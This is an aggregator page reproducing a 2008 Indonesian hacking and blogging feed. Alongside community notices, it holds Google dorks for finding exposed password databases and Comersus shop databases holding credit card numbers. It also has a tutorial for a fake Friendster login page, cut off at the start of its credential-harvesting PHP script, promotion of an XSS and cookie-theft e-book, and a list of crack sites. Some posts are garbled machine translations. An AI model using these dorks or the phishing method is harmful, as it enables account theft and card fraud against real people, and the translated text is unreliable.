Subscribe: Place to learn create blogs and websites
http://fansblogs.blogspot.com/feeds/posts/default
Added By: Feedage Forager Feedage Grade B rated
Language: Indonesian
Tags:
adalah  akan  aku  artikel  bisa  blog kita  blog  dalam  dengan  ini  kalian  kita  situs  tidak  untuk  yang 
Rate this Feed
Rate this feedRate this feedRate this feedRate this feedRate this feed
Rate this feed 1 starRate this feed 2 starRate this feed 3 starRate this feed 4 starRate this feed 5 star

Comments (0)

Feed Details and Statistics Feed Statistics
Preview: Place to learn create blogs and websites

Place to learn create blogs and websites





Last Build Date: Sat, 04 Oct 2014 20:14:40 PDT

 



Ayo Gabung Di Komunitas Aku

Wed, 29 Oct 2008 11:56:43 PDT

Untuk semua temanku yang sering berkunjung ke Blog ini, aku ingin mengajak kalian semua untuk bergabung di Situs Komunitas yang aku buat.

Situs ini aku beri nama dengan Joomla Versus Blogger Indonesian Community dengan tujuan ingin mengetahui seberapa besar persaigan antara para pengguna Joomla yang di sebut dengan Joomlaer dan pengguna Blogspot yang di sebut Blogger.

Jika biasanya kalian hanya kenal dengan dunia Blog, di sana kalian akan mengenal lebih dari dunia Blog dan aku akan mengajak kalian untuk lebih mengenal dunia Website yang sangat mudah untuk di buat.

Kalian bisa melakukan tanya jawab, chatting, membuat account, dan masih banyak yang bisa kalian lakukan jika kalian sudah bergabung dengan komunitas yang aku buat.

Namun sayang, saat ini aku masih kekurangan anggota tim untuk membantu kelancaran dari komunitas tersebut. Dan sayangnya lagi, susah sekali untuk mencari anggota tim yang ingin membantu.

Jadi, jika kalian berminat, silahkan lihat Situs yang aku buat ini Di Sini.

Untuk info bisa melalui email di admin@joomla-vs-blogger.com atau me@indrameissa.com.

Terima kasih.

(image)



Kata Maaf Dan Artikel Terakhir Kalinya

Fri, 24 Oct 2008 00:13:06 PDT

Maaf untuk yang terakhir kali, untuk semua yang pernah berkunjung ke blog ini. Mungkin kalian semua pernah melihat beberapa postingan yang aku buat dari buku dan berkomentar protes bahwa artikel tersebut buatan orang lain dan kenapa tidak ada sumbernya ? Padahal semua itu telah ada sumbernya dan aku mecantumkan sumber dari artikel tersebut namun kalian tidak sadar bahwa artikel tersebut telah diberi sumber dari penulis. Jadi jangan salahkan aku OK.

Baik, mungkin ini adalah artikel dan postingan aku yang terakhir kalinya tapi kalian masih akan tetap bisa mengunjungi blog ini. Aku minta maaf kepada kalian semua jika ada yang salah dalam blog ini. Mulai tanggal 1 November 2008 aku sudah fokus kepada 2 website yang aku buat.

Yang pertama adalah http://indrameissa.com website ini adalah website pribadi yang aku buat pertama kali. Mungkin aku akan bercerita tentang hidup aku di website tersebut.

Yang kedua adalah http://joomla-vs-blogger.com website ini adalah website komunitas yang aku buat dengan topik Joomla Versus Blogger Indonesian Community dimana bagi kalian yang merasa Blogger sejati tidak asyk jika tidak mengunjungi website ini. Karena kalian akan di tantang oleh para pengguna Joomla yang sudah menunggu kehadiran kalian semua.

OK, mungkin itu saja yang akan aku beritahu untuk terakhir kali. Sekali lagi maaf jika ada salah kata maupun salah paham.

Salam Indra Meissa
Administrator Community Team.

me@indrameissa.com
admin@joomla-vs-blogger.com

Terima kasih.


(image)



Berhenti Menjadi Hacker Dan Membangun Komunitas

Sat, 18 Oct 2008 11:21:57 PDT

Sudah lama aku ingin berhenti menjadi hacker, akhirnya sekarang aku putuskan untuk berhenti menjadi hacker. Hacker banyak dibenci orang, apalagi mereka yang sudah pernah terkena aksi hacking oleh para hacker, jadi sebelum terlambat untuk dibenci orang lebih baik aku putuskan untuk berhenti menjadi hacker.

Aku berhenti menjadi hacker karena aku ingin mempunyai banyak teman, oleh karena itu aku berhenti menjadi hacker dan membuat sebuah komunitas untuk para pengguna Joomla dan Blogger.


Untuk semua teman-teman yang sering berkunjung ke Blog ini, jangan tanyakan masalah hacking lagi yah ! Mulai sekarang tanyakanlah semua tentang Joomla dan Blogger atau Intenet atau apalah.

Bagi kalian yang ingin bergabung di komunitas yang aku buat, kalian bisa kunjungi komunitas Joomla Versus Blogger Indonesian Coomunity Di Sini

Oya, maaf yah kalau halaman dari komunitas itu masih kosong, karena memang komunitas ini belum sempurna, tapi tidak ada salahnya kan jika kalian bergabung terlebih dahulu ?

Mungkin cuma itu saja yang ingin aku tuliskan di sini, dan sekarang saatnya memulai hidup baru untuk membangun komunitas Joomla Versus Blogger Indonesian Community.

YEAH... STOP HACKING AND GO TO MY COMMUNITY.

Evidently the page this one was good also to be printed: Print This Page

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas




frameborder="0" src="http://kumpulblogger.com/machor.php?b=9148" width="100%" height="200px" marginwidth=0 marginheight=0 >
(image)



Di Cari Webmaster Atau Blogmaster

Tue, 07 Oct 2008 20:33:24 PDT

Salam Websiter dan Blogger.

Di cari 3 Webmaster atau Blogmaster yang bersedia untuk membangun komunitas Joomla VS Blogger yang akan aku publikasikan pada tanggal 1 November 2008 dengan topik seputar Joomla dan Blogger.

Jika berminat dan bersedia, langsung saja kontak aku atau memberi komentar dan mencantumkan data diri serta alamat email dan Website atau Blog.



Contoh :
Nama : Indra
Email : Indra@fansblogs.net
Website : http://www.fansblogs.net
YM : tyogitaris

Jika sudah mengirimkan data diri seperti di atas, aku akan melihat semua isi Web atau Blog kalian dan tunggu hingga 3 hari untuk persetujuan menjadi Administrator

Terima kasih.

Evidently the page this one was good also to be printed: Print This Page

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas




frameborder="0" src="http://kumpulblogger.com/machor.php?b=9148" width="100%" height="200px" marginwidth=0 marginheight=0 >
(image)



Gratis Mail Fansblogs.net

Tue, 07 Oct 2008 20:31:02 PDT

Udah lama, ga bikin artikel nih Untuk ganti ruginya, aku kasih bonus deh, mau ga ? Mau ga ? Mau ga yah ? Emangnya, apa sih bonusnya ? Bonusnya bisa kalian liat di artikel di bawah OK.Bagi kalian yang ingin satu buah account email namakamu@fansblogs.net aku akan memberikan kepada kalian secara gratis, karena aku ingin menjalin persahabatan dengan kalian dan tidak ingin mencari permusuhan. Untuk itu, aku akan memberikan email namakamu@fansblogs.net ini secara gratis kepada kalian semua yang ingin mendapatkannya.Tetapi, untuk menjadi member tentu ada syaratnya loh, tapi apa syaratnya. Syarat untuk menjadi member mudah ko, di bawah ini adalah beberapa syarat yang harus kalian lakukan untuk menjadi member :1. Jika kalian berminat menjadi member, yang pertama harus kalian lakukan adalah mengirimkan email ke alamat indra@fansblogs.net dengan subjek member fansblogs.net dan mencantumkan data diri kalian. Berikut adalah beberapa data diri yang harus kalian cantumkan dalam isi pesan email :Nama lengkapNama atau alamat situs yang kalian miliki, bisa website atau blogNama Yahoo Messenger yang kalian gunakan, untuk berkomunikasiNama email yang akan digunakan, misalnya namakamu@fansblogs.netPassword yang akan digunakan untuk email namakamu@fansblogs.netContoh :Nama lengkap : Tyo SudrajatNama atau alamat situs : http://fansblogs.blogspot.comNama Yahoo Messenger : tyogitarisNama email @fansblog.net : tyogitaris@fansblogs.netPassword untuk email @fansblogs.net : tyogitarisemail2. Jangan pernah melakukan hal-hal yang tidak baik, misalnya melakukan perubahan-perubahan yang ada pada account email, sembarangan memakai account email, isi pesan terdapat dengan pesan-pesan yang tidak baik, misalnya mengandung porno, melanggar agama, melanggar hukum dan lain sebagainya dengan hal-hal yang tidak baik. Admin berhak menghapus account email kalian jika terdapat menemukan hal-hal seperti di atas.3. Satu orang hanya diperbolehkan untuk memiliki satu account saja, berikan alamat situs yang kalian miliki agar bisa dipastikan tidak curang karena ingin memiliki lebih dari satu account.Mungkin itu saja persyaratan yang harus kalian lakukan untuk mendapatkan account email namakamu@fansblogs.net yang bisa kalian gunakan seperti email-email di Gmail, Yahoo, Hotmail, dan lain sebagainya.Untuk info lebih lanjut, kalian bisa menghubungi aku di alamat email indra@fansblogs.netEvidently the page this one was good also to be printed: Print This PageMasukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas frameborder="0" src="http://kumpulblogger.com/machor.php?b=9148" width="100%" height="200px" marginwidth=0 marginheight=0 >[...]



Selamat Hari Raya Idul Fitri

Tue, 30 Sep 2008 18:09:48 PDT

Untuk semua temanku, para Blogger dan para Webmaster, serta para Hacker, aku ingin meminta maaf kepada kalian semua, maafkan aku jika aku mempunyai kesalahan yang tidak aku sadari secara langsung maupun tidak langsung.

Tiada waktu untuk meminta maaf selain hari ini dan tiada waktu untuk memaafkan selain hari ini.

SELAMAT HARI RAYA IDUL FITRI

Salam Blogger Indonesia Indra.


(image)



Mencari Bajakan Cyber

Sun, 28 Sep 2008 07:53:52 PDT

Mencari barang bajakan di Indonesia sangatlah mudah karena sudah menjadi rahasia umum bahwa barang-barang bajakan ini penjualannya dilakukan secara terang-terangan.Siapapun kita, bisa membeli barang bajakan ini tanpa perlu memakai topeng karena penjualannya yang marak di pusat pembelanjaan. Inilah indahnya tinggal di Indonesia yang berantakan dengan segala ketidak-adilannya.Di dalam dunia Internet, pencurian terhadap barang-barang ataupun informasi illegal ini juga begitu mudah dilakukan. Dikatakan underground boleh-boleh saja, yang jelas keberadaan situs-situs ini tidak membatasi siapapun untuk mengunjunginya. Kita bahkan tidak perlu mengeluarkan uang sepeserpun kecuali biaya Internet yang mahal di negeri ini tentunya. Semuanya gratis ko !Berbagai informasi seperti mengaktifkan produk trial menjadi full version, melakukan registrasi produk antivirus agar otomatis menjadi langganan sampai tahun 2099, serta program-program aspal lainnya tersedia untuk diambil. Dengan mengunjungi situs-situs inilah, program-program canggih yang bahkan belum tersedia di pasar bajakan Indonesia bisa digunakan.Sebelum kita memutuskan mencari dan barang illegal ini, pastikan minimal browser kita telah terpasang proteksi terhadap pop-up karena sitis-situs ini biasanya akan menampilkan pop-up porno yang begitu mengganggu. Jika kita telah menggunakan SP2 Windows XP, secara otomatis IE kita telah terproteksi untuk pop-up ini. Jika tidak, aku lebih suka menggunakan toolbar Google untuk melakukannya (toolbar.google.com).Situs-situs illegal yang terkenal di Internet ini diantaranya adalah keygen.us, www.cracks.am, www.astalavista.box.am, www.phazedll.com, www.serials.ws, dan masih banyak lagi.Satu hal yang harus diingat ketika mengunjungi situs-situs seperti ini adalah jangan percaya dengan instalasi apapun yang diminta. Biasanya kita akan melihat munculnya kotak security warning yang meminta kita agar melakukan instalasi program-program tertentu dan mengatakan bahwa kita tidak bisa men-download program ataupun crack dari software illegal ini sebelum melakukan instalasi.Instalasi software ini bisa dipastikan adalah program spyware, malware, dan kawan-kawannya yang menjengkelkan jadi kita tidak boleh melakukan instalasi ini. Memang, sebaiknya membeli program yang legal karena jauh lebih aman, tapi ketika kita terpaksa harus melakukannya, resiko harus ditanggung sendiri.Terdapat beberapa istilah di dalam dunia illegal ini yaitu :SerialBiasanya merupakan text file yang berisi informasi nomor serial dari suatu program.CrackBiasanya berupa suatu program yang harus dijalankan dan program ini akan melakukan perubahan pada file-file yang diperlukan agar suatu program legal bisa berjalan tanpa memerlukan lagi aktifasi ataupun registrasi. Crack juga bisa berupa file yang akan menggantikan file asli.KeygeneratorNomor serial untuk rigestrasi program generasi terbaru adalah nomor serial yang berdasarkan komputer. Artinya nomor serial untuk komputer kita dan komputer orang lain akan berbeda. Karena itulah, nomor serial tidak bisa lagi saling di pertukarkan. Keygenerator adalah program yang haus dijalankan pada komputer yang bersangkutan agar menciptakan nomor serial yang diperlukan ini.Proses menciptakan nomor serial ini sangat beragam dan sangat tergantung pada pembuatnya. Sebagian besar pembuat software besar seperti Microsoft, CA, SAP, dan lain-lain menggunakan serial yang dibuat berdasarkan hardware yang terdapat pada komputer bersangkutan. Cara lain yang sering juga digunakan adalah nomor serial yang berdasarkan nama pendaftarnya.Full ProgramProgram bajakan biasanya dari program trial yang di-registri sehingga menjadi program aspal. Untuk itulah banyak juga produsen yang memisahkan program trial dan program full version sehingga program full version tidak bisa di-download oleh semua orang. Beberapa pihak kemudian menyediakan tempat untuk men-download program-program semacam ini seperti www.phazedll[...]



Translate Bahasa Indonesia Inggris

Wed, 24 Sep 2008 08:38:26 PDT

Halo... Blogger Reader How Are You Today ? (image)
So Inggris nih (image) tapi apa yah artinya (image)

Ya udah deh, daripada aku basa-basi yang ada nanti malah basi, nanti artikelnya malah basi.
Emang mau apa sih (image) oya, aku mau kasih sedikit Tips buat Blogging, buat kalian yang merasa kurang pintar dengan bahasa Inggris, Tips ini sangat baik untuk kalian. Apalagi kalau kalian sedang membaca email dan ada pesan yang masuk tapi pesan itu bahasa Inggris. Uuhh.. Cape Deh.. Ga ngerti sedikit juga atau yang parah lagi malah ga ngerti satu kata pun (image)


Nah, sebenarnya ini sudah lama aku temukan, sebuah Website yang bisa menerjemahkan 2 bahasa yaitu bahasa Inggris - Indonesia dan Indonesia - Inggris. Ini juga bisa kita gunakan untuk membuat artikel-artikel dalam bahasa Inggris jika kalian memang ingin membuat Blog kalian di kunjungi para Blgger dari luar Indonesia. Bisa saja kalian membuat artikel dalam bahasa Inggris dengan jasa Website ini. Website ini bernama Toggletext yang mampu menerjemahkan 2 bahasa Inggris dan Indonesia.

Untuk itu, tunggu apalagi, langsung saja kalian coba baca artikel yang berbahasa Inggris atau email yang berbahasa Inggris lalu translate Di Sini OK, semoga Tips Blogging ini membantu kalian semua (image)

Evidently the page this one was good also to be printed: Print This Page

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas




frameborder="0" src="http://kumpulblogger.com/machor.php?b=9148" width="100%" height="200px" marginwidth=0 marginheight=0 >
(image)



PR Aku Nih...

Mon, 22 Sep 2008 07:41:53 PDT

Sebelum aku mengerjakan PR ini, sebaiknya aku berdoa terlebih dahulu agar semua yang membaca artikel ini merasa aman dari godaan setan OK, mari kita berdoa sesuai agama dan kepercayaan masing-masing ALLOOHUMMA KHIRLII WAKHTARLII Artinya : Wahai Allah, pilihlah yang lebih bermanfaat untukku. (HR. At Turmidzi) Amin... Berdoa selesai.Doa di atas bener ga yah Nah, kalo biasanya aku membuat artikel pake bahasa yang baku sekarang aku ga bakal pake bahasa yang baku lagi, soalnya ini bukan artikel yang umum. Jadi, aku bakalan pake bahasa kaya biasa aja lah Aku dapet PR juga ternyata PR ini datang dari mas Yopan yang menanting aku membuat PR ini, padahal aku peling males banget yang namanya PR. Apalagi itu PR sekolah kaya Fisika, Biologi, Matematika, dan semuanya lah Tapi untuk Blooger, PR ini adalah sesuatu yang mengasyikan. Tapi, emang apa sih PR ini Apa PR sekolah ? Apa PR kuliah ? Ah..ya bukanlah, PR ini adalah PR apa yah ga bisa dijelasin sama aku deh, kalo pengen jelasnya, lian aja di artikelnya Mas Yopan yang udah ngasih PR ini sama aku.Sedikit tentang PR ini, PR yang dimaksud ini adalah PR tentang diri kita masing-masing yang artinya adalah bagaimana tentang diri kita yang sesungguhnya di dalam dunia ini, untuk itu aku akan menuliskan semua tentang aku di dalam artikel ini. Baik, buka mata kalian dan baca dengan benar Indra itu adalah nama aku yang lahir pada tanggal 19 Mei 1990 di Tangerang. Aku adalah seorang anak yang sangat bahagia dalam keluarga yang memang tidak pernah kekurangan apapun dalam segala bentuk maupun jenis. Tapi maksudnya apa yah OK, maksudnya itu adalah, keluarga yang bisa mencukupi segala kebutuhan sehari-hari dan tidak pernah kekurangan apapun Sebenarnya, aku ini anak baru yang masuk dalam dunia Internet dan Blogger. Sebelum masuk ke dalam dunia Blogger, aku sudah membuat Wapsite yang beralamatkan di http://tyogitaris.xtgem.com tapi sekarang Wap itu udah ga aku urus karena aku sudah terkena Virus Blogger ini Saat itu, sambil mengurus Wap aku sering main-main dengan Friendster dan belum mengerti apa-apa sampai aku kesal dengan halaman pribadi dan foto-foto yang suka di Private sama pemiliknya. Dari situ aku berfikir, bagaimana agar aku bisa melihat isi dari halaman dan foto yang di Private ? Saat itu, aku mendengar bahasa Hacker, Hacker yang sangat jahat dan ga bertanggung jawab ini bisa apa saja yang dia inginkan, trus aku tertarik dengan mereka-mereka yang memiliki otak yang cerdas seperti itu. Sampai akhirnya aku bisa meng-hack Friendster dan mulai menggunakan berbagai teknik Hacking yang mulai ramai dibicarakan di Internet.Setelah cerita di atas, aku mulai terserang Virus Blogger saat melihat berbagai artikel yang ada pada Blog-Blog yang memiliki ciri khas sendiri, entah itu Tips, Trik, Blogging, Googling, dan lain sebagainya. Dan aku tertarik juga dengan membuat Blog, pada saat itu, aku membahas topik Musik dan Gitaris sebelum membahas topik Hacking ini. Tapi ko dari Musik nyasar ke Hacking yah Ok, akan aku jelaskan kenapa dari Musik sampai ke Hacking. Pertama, memang aku adalah seorang anak yang memiliki Hobi bermain Musik, dan dalam Band aku yang bernama MINI ROCKS BAND (promosi sedikit) aku memegang Gitar sesuai keinginanku ingin menjadi seorang Gitaris yang ternama. Kedua, masalah Hacker ini, karena aku ingin juga menjadi seorang Hacker di dunia Internet yang sangat luas seluas laut ini. Tapi untuk masalah Hacking sepertinya aku belum bisa dikatakan sebagai Hacker yang handal, dikarenakan memang otak aku belum nyampe situuuuuuu Berikutnya adalah data diri aku yang bisa kalian lihat dengan baik :Nama : IndraLahir : Tangerang 19 Mei 1990Hobi : Main Musik, Game, InternetCita-Cita : Menjadi MusisiMakanan Favorite : Fried ChickenMinuman Favorite : Teh BotolMusik Favorite : J-Rocks dan L`Arc~en~ciel.Film Favorite : DigimonBuku Favorite : Majalah Musik dan KomputerBingung deh,[...]



Free E-Book Friendster Hacking

Mon, 22 Sep 2008 07:14:40 PDT

Aku tidak menyagka deh... Artikel E-Book ini ternyata masuk dalam kategori 10 Terbaik dan menempati jajaran paling atas di infogue.com dalam Kategori Security & Hacking.Hebat... E-Book yang satu ini, yang aku buat sendiri dengan tangan yang lambat dan super lambat akhirnya jadi juga E-Book yang kira-kira ukurannya adalah 4 MB lebih dan 80 Halaman lebih ini sangat WAJIB kalian Download. Dan baca artikel ini sampai selesai dan dapatkan apa yang bisa E-Book ini berikan kepada kalian semua Yang pertama, aku ingin ucapkan terima kasih buat mas Anselmus Ricky yang sudah memberi informasinya. Keren bagetsss deh. Semoga beliau akan senang dengan adanya E-Book yang aku buat ini Yang kedua, aku ingin bilang kepada semua para pengunjung Situs Fans Blogs atau siapapun itu kalian semua, apalagi bagi kalian semua yang sering maenin Friendster, kalian pasti RUGI dan sangat RUGI kalau tidak Men-download E-Book ini, apalagi sampai tidak membacanya sedikitpun. Bukan maksa, tapi kenyataan Apabila kalian adalah seorang pengguna Friendster dan belum tahu akan ancaman apa saja yang bisa terjadi terhadap account kalian dan kalian pribadi, maka E-Book Friendster Hacking ini wajib menunjukkan hal-hal yang luar bisa (atau biasa di luar he..he..he..) yang bisa dilakukan seorang Hacker dengan menguasai account kalian di Friendster Pernahkah kalian medengar bahwa banyak sekali celah pada sistem Friendster seperti Testimonial ? Atau mungkin mengetahui bahwa ada orang yang menggunakan halaman login palsu Friendster untuk mendapatkan username dan password seseorang ? Atau yang lebih ekstrimnya mungkin mencuri Cookie seseorang dan melakukan Hacking Windows dengan Friendster ?Bagaiman caranya Tapi yang terpenting adalah bagaimana pencegahannya ? E-Book Friendster Hacking ini secara terang-terangan membahas mengenai berbagai celah keamanan yang terjadi dalam menggunakan layanan Internet, khususnya layanan jaringan sosial seperti Friendster. Juga bagaimana kita bisa mencegahnya dengan terlebih dahulu mengetahui cara-cara dan berbagai teknik yang digunakan seorang Hacker Dengan membaca dan men-dowbload E-Book ini, kalian akan mengetahui :Fakta, konsep, dan sejarahFriendster HackingHalaman login palsu FriendsterCelah pada TestimonialFlash ExploitCross Site Scripting (XSS)Pencurian CookieMencuri password via CookieDan masih banyak lagiMungkin kalian akan terkejut setelah membaca semua isi dari E-Book ini yang secara GRATIS dan CUMA-CUMA. Ayo...ayo..ayo.. Lima Ribu Dapet Dua Lima Ribu Dapet Dua Download E-Book Friendster Hacking DI SINIJika kalian sudah men-download dan membaca semua isi E-Book ini, jangan lupa memberikan komentar tentang E-Book ini. Sehingga jika nanti ada kesempatan lagi aku akan membuat E-Book yang seperti ini lagi Evidently the page this one was good also to be printed: Print This PageMasukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas src="http://kumpulblogger.com/machor.php?b=9148" marginwidth="0" marginheight="0" frameborder="0" height="200" width="100%">[...]



Google Hacking Got Password

Tue, 16 Sep 2008 05:27:42 PDT

Did deface or took over a computer, always must not through the process that was known uptil now as looking for the weakness and the exploitation through various techniques. Without through the technique that was difficult and complicated as well as needed high knowledge, by looking for the location database went through Google also evidently could be carried out.


I will order so that Google looks for the location that had database access that had extention file .mdb and had words password or passwd with URL him. For the order OR (OR), could be used by the character "|" so as, syntax that was used was: filetype:mdb inurl:"passwd|password

By that, we could get dozens of sites that protected database him with password, but with software pembongkar like passware, database this could be opened in 1 minute (image)

There was again the site that if being seen will take the form of the asterisk, but that only his form then. Only with eliminated inout mask password in database him, then password immediately will appear (image)

Basically, was suggested by me should not had kept database that could be accessed directly by the public except be forced (image)

Evidently the page this one was good also to be printed: Print This Page

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas




frameborder="0" src="http://kumpulblogger.com/machor.php?b=9148" width="100%" height="200px" marginwidth=0 marginheight=0 >
(image)



Google Hacking Mendapatkan Password

Tue, 16 Sep 2008 05:27:53 PDT

Mendeface atau mengambil alih sebuah komputer, tidak harus selalu melalui proses yang dikenal selama ini seperti mencari kelemahan dan eksploitasi melalui berbagai teknik. Tanpa melalui teknik yang susah dan rumit serta membutuhkan pengetahuan tinggi, dengan mencari lokasi database melalui Google-pun ternyata bisa dilakukan.


Aku akan memerintahkan agar Google mencari lokasi yang mempunyai database access yang mempunyai extention file .mdb dan mempunyai kata password atau passwd dengan URL-nya. Untuk perintah ATAU (OR), bisa digunakan karakter "|" sehingga, syntax yang digunakan adalah : filetype:mdb inurl:"passwd|password"

Dengan itu, kita bisa mendapatkan puluhan situs yang memproteksi databasenya dengan password, tapi dengan software pembongkar seperti passware, database tersebut bisa dibuka dalam 1 menit (image)

Ada lagi situs yang jika dilihat akan berupa tanda bintang, tapi itu hanyalah tampilan. Hanya dengan menghilangkan inout mask password pada databasenya, maka password akan langsung kelihatan (image)

Intinya, aku sarankan jangan pernah menyimpan database yang bisa diakses langsung oleh publik kecuali terpaksa (image)

Evidently the page this one was good also to be printed: Print This Page

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas




frameborder="0" src="http://kumpulblogger.com/machor.php?b=9148" width="100%" height="200px" marginwidth=0 marginheight=0 >
(image)



Hacking Carder And Credit Card

Thu, 18 Sep 2008 23:42:09 PDT

This article was the article that made me hesitant to in posting or not. And finally after I broke, this article would I posting then. One of them was that this information has spread in the circle underground and has been used seccara the area. Only official publications that happened uptil now, had not named his methods walalu also in fact very simple. Moreover, we studied the technique that was used by Carder, not studied became a person of Carder The process of the theft must be always begun with knowledge would the characteristics something anything that will be looked for by us. Information of a credit card usually was obtained by Carder with took database that contained the customer's data and of course the number of the credit card to an online shop Possibly we think that we would ama bertransaksi with this shop because they used enkripsi that was very strong.We were wrong if being thoughtful like that. The theft of the credit card by Carder very rare in fact never by tapping the SSL transaction (enkripsi). The perpetrators took him direct from database the online shop and might not be completely connected with enkripsi that was complicated.For example, I will show bagaiman the ease got the number of the credit card in the Internet by making use of Google. Numbers of this credit card that had a big opportunity will be used by Carder. Remember, Carder was the same as the thief and the swindler, jengan had been proud the heart became a person of Carder (maaf if between you there are those that has become a person of Carder and read these words), because here I only gave trick information and not for the crime So, I will take one of the examples of however many examples that is the application ComersusComersus was the application that was made with the ASP language for the online sale transaction.This application free was available source code in the form of ASP so as really enabled when wanting to be modified. Comersus also enclosed database default that had a name comersus mdb (file access) to keep all information, including the credit card.Although the name database could be changed, or was kept into some directory the Private, is still having people who did not carry him out. They hid database this into one directory that was regarded as secret, until Google found him! To try to search database this, the operator who could be used was inurl:comersus.mdb. this Order will ask Google to look for sites that had file database comersus.mdb. The trial of this very simple search, evidently mengahasilkan dozens of sites that at once could be taken database him without must through the Hacking process that was complicated. Only with meng-clique of the address database this, database that really rehasia this was obtained. Google, like that was said by me could be used to get almost any in the Internet. Indeed the first time, almost was unimaginable that in fact got the number of the credit card like that the ease (because that was once more said by me should not be had been proud of becoming a person of Carder). Knew the Hacking technique this kind, developae that built a site necessarily should not become red kept database in directory that could be accessed by the public. Database a big company the manufacturer of the computer book in Indonesia also had been taken although his contents not the contents that was kept secret. At that time they used Microsoft Accsess. His cause was almost same, database this could be accessed by the public if knowing the location directory the secret. This problem until this was still staying same because of the limitation that Web Hosting that did not permit the location database that was safe. Then what could be done by me? Periodically, I only tried decisive that da[...]



Hacking Carder Dan Kartu Kredit

Fri, 12 Sep 2008 09:15:19 PDT

Artikel ini adalah artikel yang membuat aku ragu untuk di posting atau tidak. Dan akhirnya setelah aku memutuskan, artikel ini akan aku posting saja. Salah satunya adalah bahwa informasi ini sudah menyebar di kalangan underground dan sudah digunakan seccara luas. Hanya publikasi resmi yang terjadi selama ini, tidak pernah menyebutkan cara-caranya walalupun sebenarnya sangat sederhana. Selain itu, kita mempelajari teknik yang digunakan oleh para Carder, bukan mempelajari menjadi seorang Carder Proses pencurian selalu harus dimulai dengan pengetahuan akan ciri-ciri sesuatu apapun yang akan kita cari. Informasi suatu kartu kredit biasanya didapatkan oleh para Carder dengan mengambil database yang berisi data pelanggan dan tentu saja nomor kartu kredit pada suatu toko online Mungkin kita berpikir bahwa kita akan ama bertransaksi dengan toko tersebut karena mereka telah menggunakan enkripsi yang sangat kuat.Kita salah kalau berpikiran seperti itu. Pencurian kartu kredit oleh para Carder sangat jarang bahkan tidak pernah dengan menyadap transaksi SSL (enkripsi). Pelaku mengambilnya langsung dari database toko online dan tidak perlu berhubungan sama sekali dengan enkripsi yang rumit.Sebagai contoh, aku akan memperlihatkan bagaiman mudahnya mendapatkan nomor kartu kredit di Internet dengan memanfaatkan Google. Nomor-nomor kartu kredit inilah yang berpeluang besar akan digunakan oleh para Carder. Ingatlah, Carder sama dengan maling dan penipu, jengan pernah berbangga hati menjadi seorang Carder (maaf jika di antara kalian ada yang sudah menjadi seorang Carder dan membaca kata-kata tersebut), karena di sini aku hanya memberi info trik saja dan bukan untuk kejahatan Untuk itu, aku akan mengambil salah satu contoh dari sekian banyak contoh yaitu aplikasi ComersusComersus adalah aplikasi yang dibuat dengan bahasa ASP untuk transaksi penjualan online.Aplikasi ini gratis tersedia source code dalam bentuk ASP sehingga sangat memungkinkan bila ingin dimodifikasi. Comersus juga menyertakan database default yang bernama comersus mdb (file access) untuk menyimpan semua informasi, termasuk kartu kredit.Walaupun nama database bisa dirubah, atau disimpan ke dalam suatu directory private, masih saja ada orang-orang yang tidak melakukannya. Mereka menyembunyikan database tersebut ke dalam sebuah directory yang dianggap rahasia, sampai Google menemukannya !Untuk mencoba mencari database ini, operator yang bisa digunakan adalah inurl:comersus.mdb. Perintah ini akan meminta Google mencari situs-situs yang mempunyai file database comersus.mdb.Percobaan pencarian yang sangat sederhana ini, ternyata mengahasilkan puluhan situs yang bisa langsung diambil database-nya tanpa harus melalui proses Hacking yang rumit. Hanya dengan meng-klik alamat database tersebut, database yang sangat rehasia ini telah didapatkan.Google, seperti yang aku katakan bisa digunakan untuk mendapatkan hampir apa saja di Internet. Memang pertama kali, hampir tidak terbayangkan bahwa sebenarnya mendapatkan nomor kartu kredit begitu mudahnya (karena itu sekali lagi aku katakan jangan pernah bangga menjadi seorang Carder). Mengetahui teknik Hacking semacam ini, para developae yang membangun sebuah situs seharusnya jangan perah menyimpan database pada directory yang bisa diakses oleh umum. Database sebuah perusahaan besar pembuat buku komputer di Indonesia juga pernah diambil walaupun isinya bukanlah isi yang dirahasiakan. Saat itu mereka menggunakan Microsoft Accsess.Penyebabnya hampir sama, database tersebut bisa diakses oleh umum jika mengetahui lokasi directory rahasia. Permasalahan tersebut sampai saat ini masih tetap sama karena batasan yang Web Hosting yang tidak mengizinkan lokasi database yang aman. Lalu apa yang bisa aku laku[...]



Membuat Halaman Friendster Palsu

Sat, 13 Sep 2008 07:37:51 PDT

Sebelumnya maaf yah karena kemarin aku membuat artikel yang salah. Tapi untuk menebus kesalahan yang aku buat, sekarang aku akan menjelaskan semua dengan sebenar-benarnya Ok, daripada lama-lama, dan basa-basi yang ada nanti basi langsung saja yah, aku akan menjelaskan untuk membuat halaman Friendster palsu. Mau? Three (3) jaringan seluler mu Kalau berhasil, jangan lupa komentarnya yah...Dan juga tidak ketinggalan untuk Anselmus Ricky th0r sang Hacker yang TOP BGT. Jangan Hack Blog aku yah. Aku kan masih tidak mengerti apa-apa Sebelum membaca artikel di bawah, ada baiknya men-download E-Book panduan untuk membuat Flash Di Sini agar kalian bisa membuat halaman log in friendster palsu dengan baik.Persiapkan Diri Kalian Untuk Membaca Artikel Yang Panjang IniPada dasarnya, dalam setiap peristiwa login setiap pengguna Friendster, ada dua buah file yang terlibat secara langsung, yaitu Login.php dan Submit.php yang ada pada http://www.friendster.com. Kedua file ini mememiliki sedikit perbedaan dalam fungsi kerjanya, secara mudah dapat kita asumsikan bahwa login.php tersebut lebih berfungsi sebagai Interface bagi para pengguna Friendster untuk melakukan login, sedangkan submit.php adalah file yang bekerja sebagai pengirim informasinya yang kita masukkan ke server Friendster.Kita tidak akan mengubah script yang ada pada login.php milik Friendster, karena pada dasarnya memang tidak diperlukan perubahan apapun, ini hanya sebuah tampilan yang akan ditunjukkan pada pengguna yang ingin melakukan login ke dalam account Friendser mereka. Di lain pihak, kita akan melakukan lebih banyak perubahan pada submit.php tersebut.Sebelum memulai langkah-langkah yang akan kita lakukan, kita harus mengetahui bahwa script yang akan kita gunakan sebagai submit.php dapat dilihat sebagai berikut:>?phpfunction validstr($strutama){if(strstr($strutama,"@")){return true;}else{ return false;}}//$ip = getenv 